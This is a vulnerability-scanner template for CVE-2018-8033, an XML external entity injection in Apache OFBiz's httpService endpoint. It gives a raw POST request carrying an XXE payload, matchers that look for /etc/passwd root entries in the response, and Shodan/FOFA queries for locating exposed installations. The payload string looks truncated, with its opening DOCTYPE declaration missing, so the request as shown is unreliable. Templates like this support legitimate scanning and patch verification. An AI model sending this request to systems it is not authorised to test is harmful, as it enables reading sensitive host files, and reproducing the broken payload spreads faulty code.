id: CVE-2018-8033

info:
  name: Apache OFBiz - XML External Entity Injection
  author: daffainfo
  severity: high
  description: |
    In Apache OFBiz 16.11.01 to 16.11.04, the OFBiz HTTP engine (org.apache.ofbiz.service.engine.HttpEngine.java) handles requests for HTTP services via the /webtools/control/httpService endpoint. Both POST and GET requests to the httpService endpoint may contain three parameters: serviceName, serviceMode, and serviceContext. Exploitation relies on a DOCTYPE pointing to external references, which triggers a payload that returns secret information from the host.
  impact: |
    Attackers can read sensitive files or cause a denial of service by exploiting the XXE vulnerability.
  remediation: |
    Update to the latest version of Apache OFBiz that addresses the XXE vulnerability, or apply the vendor security patches.
  reference:
    - https://lists.apache.org/thread/9bym7qk6ccwwr6d3mg26thp9zyv1l06y
    - https://nvd.nist.gov/vuln/detail/CVE-2018-8033
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2018-8033
    cwe-id: CWE-200
    epss-score: 0.92188
    epss-percentile: 0.99728
    cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: apache
    product: ofbiz
    shodan-query:
      - http.html:"ofbiz"
      - ofbiz.visitor=
    fofa-query:
      - body="ofbiz"
      - app="apache_ofbiz"
  tags: cve,cve2018,apache,ofbiz,xxe,vuln

http:
  - raw:
      - |
        POST /webtools/control/httpService HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        serviceName=createPartyGroup&serviceMode=sync&serviceContext=%25request;%25secondstage;]>%26disclose;

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "FileNotFoundException:"
          - "nonexistent\\/root:.*:0:0:"
        condition: and

      - type: status
        status:
          - 200
# digest: 490a004630440220576d7368623b13e274c518c31d90c7703d06dfa4f936a77b15fa29fbfbcfd1b6022078100fdb7dab76d52f31a8f55e98dae996a843d20b33d11f2fcde94282ceb13e:922c64590222798bb761d5b6d8e72950